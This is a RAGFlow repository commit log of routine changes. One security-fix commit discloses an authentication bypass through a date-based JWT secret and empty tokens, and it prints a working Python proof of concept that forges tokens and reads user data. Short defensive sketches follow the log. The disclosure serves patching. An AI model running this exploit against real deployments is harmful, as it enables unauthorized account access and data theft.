ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2025-09-03 05:17:01 +00:00

Author	SHA1	Message	Date
balibabu	7c7359a9b2	Feat: Solved the problem that BeginForm would get stuck when modifying data #3221 (#8080 ) ### What problem does this PR solve? Feat: Solved the problem that BeginForm would get stuck when modifying data #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-05 15:12:21 +08:00
Liu An	ee52000870	Test: add sdk Dataset test cases (#8077 ) ### What problem does this PR solve? Add sdk dataset test cases ### Type of change - [x] Add test case	2025-06-05 13:20:28 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in an assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Liu An	8b7c424617	Fix: Document.update() now refreshes object data (#8068 ) ### What problem does this PR solve? #8067 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:46:29 +08:00
Stephen Hu	640fca7dc9	Fix: set output for Message template (#8064 ) ### What problem does this PR solve? The streaming logic currently does not match the non-streaming logic, which can leave downstream components unable to find their upstream components. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:10:40 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 )	2025-06-05 12:10:24 +08:00

### Description

There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system.

The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls.

### Source - Sink Analysis

Source (User Input): HTTP Authorization header containing attacker-controlled JWT token

Flow Path:

1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142)
2. Token Processing: JWT token extracted from Authorization header
3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123)
4. Database Query: `UserService.query()` called with decoded empty access_token
5. Sink: Authentication succeeds, returning first user with empty access_token

### Proof of Concept

```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys


def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")

    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")

    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]

    auth_headers = {"Authorization": malicious_token}

    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)

        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f" Email: {user_data.get('email')}")
                    print(f" User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f" Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()


if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```

Exploitation Steps:

1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any credentials

Version: 0.19.0

@KevinHuSh @asiroliu @cike8899

Co-authored-by: nkoorty <amalyshau2002@gmail.com>
Stephen Hu	f819378fb0	Update api_utils.py (#8069 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8059#issuecomment-2942407486 lazy throw exception to better support custom embedding model ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:05:58 +08:00
balibabu	c163b799d2	Feat: Create empty agent #3221 (#8054 ) ### What problem does this PR solve? Feat: Create empty agent #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-05 12:04:31 +08:00
Liu An	4f3abb855a	Fix: remove zhipu ai api key (#8066 ) ### What problem does this PR solve? - Removed hardcoded Zhipu API key from codebase - New requirement: Tests now require ZHIPU_AI_API_KEY environment variable Example: export ZHIPU_AI_API_KEY=your_api_key_here ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:04:09 +08:00
Mathias Panzenböck	a374816fb2	Don't use '，' (U+FF0C) but ', ' (U+2C U+20) (#8063 ) The Unicode codepoint '，' (U+FF0C) is meant to be used in Chinese text, but this is English text. It looks like a comma followed by a space, but isn't. Of course I didn't change actual Chinese text. ### What problem does this PR solve? Mixup of Unicode characters. This is probably unnoticed by most users, but I wonder if screen readers would read it out differently or if LLMs would trip up on it. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [x] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-06-05 09:29:07 +08:00
Liu An	ab5e3ded68	Fix: DataSet.update() now refreshes object data (#8058 ) ### What problem does this PR solve? #8057 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 09:26:19 +08:00
Kevin Hu	ec60b322ab	Fix: data missing after upgrading. (#8047 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 16:25:34 +08:00
balibabu	8445143359	Feat: Add RunSheet component #3221 (#8045 ) ### What problem does this PR solve? Feat: Add RunSheet component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 15:56:47 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Liu An	73f9c226d3	Fix: Allow None value for parser_config in create_dataset SDK method (#8041 ) ### What problem does this PR solve? Fix parser_config=None handling in create_dataset ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 13:16:32 +08:00
Liu An	52c814b89d	Refa: Move HTTP API tests to top-level test directory (#8042 ) ### What problem does this PR solve? Move test cases only - CI still runs tests under sdk/python ### Type of change - [x] Refactoring	2025-06-04 13:16:17 +08:00
Stephen Hu	b832372c98	Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037 ) ### What problem does this PR solve? Close #8033 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 10:18:14 +08:00
writinwaters	7b268eb134	Docs: Miscellaneous UI updates (#8031 ) ### What problem does this PR solve? ### Type of change - [x] Documentation Update	2025-06-04 09:31:41 +08:00
Adrian Altermatt	31d2b3cb5a	Fix: Grammar and clarity improvements in prompt templates (#8023 ) ## Summary Fixed grammar errors and improved clarity in prompt templates throughout `rag/prompts.py`. ## Changes Made - Fixed incomplete sentence: `"If the user's latest question is completely, don't do anything"` → `"If the user's latest question is already complete, don't do anything"` - Improved phrasing: `"of like [ID:i]"` → `"such as [ID:i]"` - Added missing articles: `"give top 3"` → `"give the top 3"` - Fixed prepositions: `"in language of"` → `"in the same language as"` - Corrected spelling: `"Jappanese"` → `"Japanese"` - Standardized formatting: Consistent role descriptions and punctuation ## Impact These changes improve prompt readability and should make instructions clearer for the underlying language models. ## Test Plan - [x] Verified changes maintain original prompt functionality - [x] No breaking changes to prompt structure or expected outputs Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>	2025-06-03 19:41:59 +08:00
balibabu	ef899a8859	Feat: Add DynamicPrompt component #3221 (#8028 ) ### What problem does this PR solve? Feat: Add DynamicPrompt component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 19:41:35 +08:00
balibabu	e47186cc42	Feat: Add AgentNode component #3221 (#8019 ) ### What problem does this PR solve? Feat: Add AgentNode component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 17:42:30 +08:00
Kevin Hu	b6f1cd7809	Fix: no kb selected for an assistant. (#8021 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 17:42:16 +08:00
Stephen Hu	f56f7a5f94	Fix: Set Output In Category Component (#8010 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8006 The category component should work well, but its downstream components seem unable to get the upstream output. This PR adds the category's output as an attribute. However, base.py contains the logic `if self.component_name.lower().find("switch") < 0 and self.get_component_name(u) in ["relevant", "categorize"]: continue`. When that branch is taken, no attempt is made to get the output from Category (I do not have full context on this condition). ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 15:40:16 +08:00
balibabu	4cd0df0567	Feat: Construct RetrievalForm with original fields #3221 (#8012 ) ### What problem does this PR solve? Feat: Construct RetrievalForm with original fields #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 15:40:04 +08:00
Liu An	e64da8b2aa	Fix: sdk can not update chat model (#8016 ) ### What problem does this PR solve? #7791 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 15:22:26 +08:00
Liu An	e702431fcb	Feat: sync test group to top pyproject.toml (#8015 ) ### What problem does this PR solve? sync test group from sdk/python/pyproject.toml to top pyproject.toml ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 15:21:06 +08:00
Kevin Hu	156290f8d0	Fix: url path join issue. (#8013 ) ### What problem does this PR solve? Close #7980 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 14:18:40 +08:00
Yongteng Lei	37075eab98	Feat: add voyage-multimodal-3 (#7987 ) ### What problem does this PR solve? Add voyage-multimodal-3. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 11:56:59 +08:00
zstar	37998abef3	Update synonym dictionary file (#7997 ) ### What problem does this PR solve? Update the synonym dictionary file with relevant time and date to prevent synonyms from being mistakenly escaped. ### Type of change - [x] Refactoring	2025-06-03 09:41:53 +08:00
writinwaters	09f8dfe456	Docs: Updated UI tips for reranker (#7983 ) ### What problem does this PR solve? ### Type of change - [x] Documentation Update	2025-05-30 19:50:30 +08:00
balibabu	259a7fc7f1	Feat: Add the example component of the classification operator #3221 (#7986 ) ### What problem does this PR solve? Feat: Add the example component of the classification operator #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-30 19:25:32 +08:00
Kevin Hu	93f5df716f	Fix: order chunks from docx by positions. (#7979 ) ### What problem does this PR solve? #7934 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 17:20:53 +08:00
balibabu	9f38b22a3f	Feat: Use one-way data flow to synchronize the form data to the canvas #3221 (#7977 ) ### What problem does this PR solve? Feat: Use one-way data flow to synchronize the form data to the canvas #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-30 16:02:27 +08:00
Yongteng Lei	bd4678bca6	Fix: Unnecessary truncation in markdown parser (#7972 ) ### What problem does this PR solve? Fix unnecessary truncation in markdown parser. So that markdown can work perfectly like [this](https://github.com/infiniflow/ragflow/issues/7824#issuecomment-2921312576) in #7824, supporting multiple special delimiters. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 15:04:21 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
CharlesHsu	241fdf266a	Fix: Prevent Flask hot reload from hanging due to early thread startup (#7966 ) Fix: Prevent Flask hot reload from hanging due to early thread startup ### What problem does this PR solve? When running the Flask server with `use_reloader=True` (enabled during debug mode), modifying a Python source file would trigger a reload detection (`Detected change in ...`), but the application would hang instead of restarting cleanly. This was caused by the `update_progress` background thread being started too early, often within the main module scope. This issue was reported in [#7498](https://github.com/infiniflow/ragflow/issues/7498). ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --- Summary of changes: - Wrapped `update_progress` launch in a `threading.Timer` with delay to avoid premature thread execution. - Marked thread as `daemon=True` to avoid blocking process exit. - Added `WERKZEUG_RUN_MAIN` environment check to ensure background threads only run in the reloader child process (the actual Flask app). - Retained original behavior in production mode (`debug=False`). --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-05-30 13:38:30 +08:00
Stephen Hu	62611809e0	Fix: Add user_id when create Conversation (#7960 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7940 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 13:11:41 +08:00
xiaoping	a835e97440	Update docker-compose.yml (#7962 ) If the name field is not specified, Docker Compose will default to using `docker` as the project name. This may cause conflicts with other default projects, leading to unintended operations when executing `docker compose` commands. ### What problem does this PR solve? When executing Docker Compose commands, interference occurs between multiple default projects, leading to operational chaos. ### Type of change - [x] Other (please describe):	2025-05-30 13:10:59 +08:00
dong	62de535ac8	Fix Bug: When performing the dify_retrieval, the metadata of the document was empty. (#7968 ) ### What problem does this PR solve? When performing the dify_retrieval, the metadata of the document was empty. ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:58:05 +08:00
Qidi Cao	f0879563d0	fix: resolve residual image files issue after document deletion (#7964 ) ### What problem does this PR solve? When deleting knowledge base documents in RAGFlow, the current process only removes the block texts in Elasticsearch and the original files in MinIO, but it leaves behind many binary images and thumbnails generated during chunking. This pull request improves the deletion process by querying the block information in Elasticsearch to ensure a more thorough and complete cleanup. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:56:33 +08:00
balibabu	02db995e94	Feat: Install why-did-you-render to detect component updates #3221 (#7969 ) ### What problem does this PR solve? Feat: Install why-did-you-render to detect component updates #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-30 12:14:44 +08:00
Stephen Hu	a31ad7f960	Fix: File selection in Retrieval testing causes other options to disappear (#7759 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7753 Internally, a change to the selected row keys triggers a test run, but I do not know why. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 09:38:50 +08:00
balibabu	e97fd2b5e6	Feat: Add InnerBlurInput component to avoid frequent updates of zustand causing the input box to lose focus #3221 (#7955 ) ### What problem does this PR solve? Feat: Add InnerBlurInput component to avoid frequent updates of zustand causing the input box to lose focus #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 19:52:56 +08:00
Yongteng Lei	49ff1ca934	Fix: code debug (#7949 ) ### What problem does this PR solve? Fix the code component debug issue, #7908. I deleted the additions from #7933; `output` has no semantic meaning for `parameters`. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-29 16:53:27 +08:00
Yongteng Lei	46963ab1ca	Fix: add advanced delimiter detection for naive merge (#7941 ) ### What problem does this PR solve? Add advanced delimiter detection for naive merge. #7824 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 16:17:22 +08:00
giiiiiithub	6ba5a4348a	set PARALLEL_DEVICES default value= 0 (#7935 ) ### What problem does this PR solve? It would fail if PARALLEL_DEVICES = None in the OCR class, because it passes 0 to the TextDetector and TextRecognizer init methods. It would be simpler to set 0 as the default value for PARALLEL_DEVICES. ### Type of change - [x] Refactoring	2025-05-29 13:32:16 +08:00
天海蒼灆	f584f5c3d0	agents openai API add new way to get session_id (#7937 ) ### What problem does this PR solve? SpringAI can only add session_id in metadata, so this PR adds a new way to get session_id from "id" or "metadata.id". ![image](https://github.com/user-attachments/assets/0c698ebb-2228-46d8-94c5-2a291b6f70bf) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 13:31:17 +08:00
Stephen Hu	a0f76b7a4d	Fix: add default output method for ComponentParamBase (#7933 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7908 The code `_, out = cpn.output(allow_partial=False)` needs to call the method `def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]: o = getattr(self._param, self._param.output_var_name)`, but I do not have the full context. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-29 11:50:01 +08:00
balibabu	3f695a542c	Feat: Use memo to wrap canvas nodes to improve fluency #3221 (#7929 ) ### What problem does this PR solve? Feat: Use memo to wrap canvas nodes to improve fluency #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-05-29 11:10:45 +08:00
Jason Li	64f930b1c5	Truncate long agent descriptions text (#7924 ) Truncate long agent descriptions to prevent overflow outside the agent card container ### What problem does this PR solve? Long description text currently overflows the agent card; it should be truncated so that it displays properly. <img width="275" alt="Screenshot 2025-05-28 220329" src="https://github.com/user-attachments/assets/954b3a48-bcab-4669-a42f-6981d4bf859f" /> <img width="275" alt="Screenshot 2025-05-28 220353" src="https://github.com/user-attachments/assets/f385d95a-3e40-4117-b412-ae6a4508e646" /> ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-05-29 11:10:02 +08:00
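
Commit 241fdf266a above describes keeping background threads from hanging Flask's hot reload: delay the start with `threading.Timer`, mark the thread as a daemon, and only start it when `WERKZEUG_RUN_MAIN` indicates the reloader child process. A minimal sketch of that pattern follows. The helper names `should_start_workers` and `start_worker` are hypothetical and not taken from the RAGFlow code; the sketch assumes only that Werkzeug sets `WERKZEUG_RUN_MAIN=true` in the reloader child.

```python
import os
import threading


def should_start_workers(debug, environ=os.environ):
    """Return True only in the process that actually serves requests.

    Hypothetical helper, not part of RAGFlow.
    """
    if not debug:
        # Production mode: no reloader is involved, so start as before.
        return True
    # With the reloader enabled, Werkzeug sets WERKZEUG_RUN_MAIN=true
    # in the child process that runs the real application.
    return environ.get("WERKZEUG_RUN_MAIN") == "true"


def start_worker(target, debug, delay=1.0, environ=os.environ):
    """Schedule `target` on a daemon timer thread; return None when skipped."""
    if not should_start_workers(debug, environ):
        return None
    timer = threading.Timer(delay, target)
    timer.daemon = True  # a daemon thread does not block process exit
    timer.start()
    return timer
```

In the reloader parent process (debug on, variable unset) `start_worker` returns `None`, so only the child that serves requests runs the background job.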

3217 Commits
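
Commit de89b84661 above names two flaws: a `SECRET_KEY` that defaults to `str(date.today())`, and acceptance of empty access tokens. The sketch below shows one possible hardening for each, using only the standard library. It is an illustration under stated assumptions, not necessarily what the commit implements; `resolve_secret_key` and `is_valid_access_token` are hypothetical names.

```python
import secrets


def resolve_secret_key(configured=None):
    """Return the configured key, or a random one instead of a date string.

    Hypothetical helper, not part of RAGFlow.
    """
    if configured:
        return configured
    # 32 random bytes, hex-encoded: not guessable, unlike str(date.today()).
    return secrets.token_hex(32)


def is_valid_access_token(token):
    """Reject missing, non-string, or blank tokens before any user lookup."""
    return isinstance(token, str) and token.strip() != ""
```

A randomly generated fallback key changes on every process start, so previously issued tokens stop validating after a restart and are not shared between worker processes; a deployment that needs stable sessions would set the key explicitly.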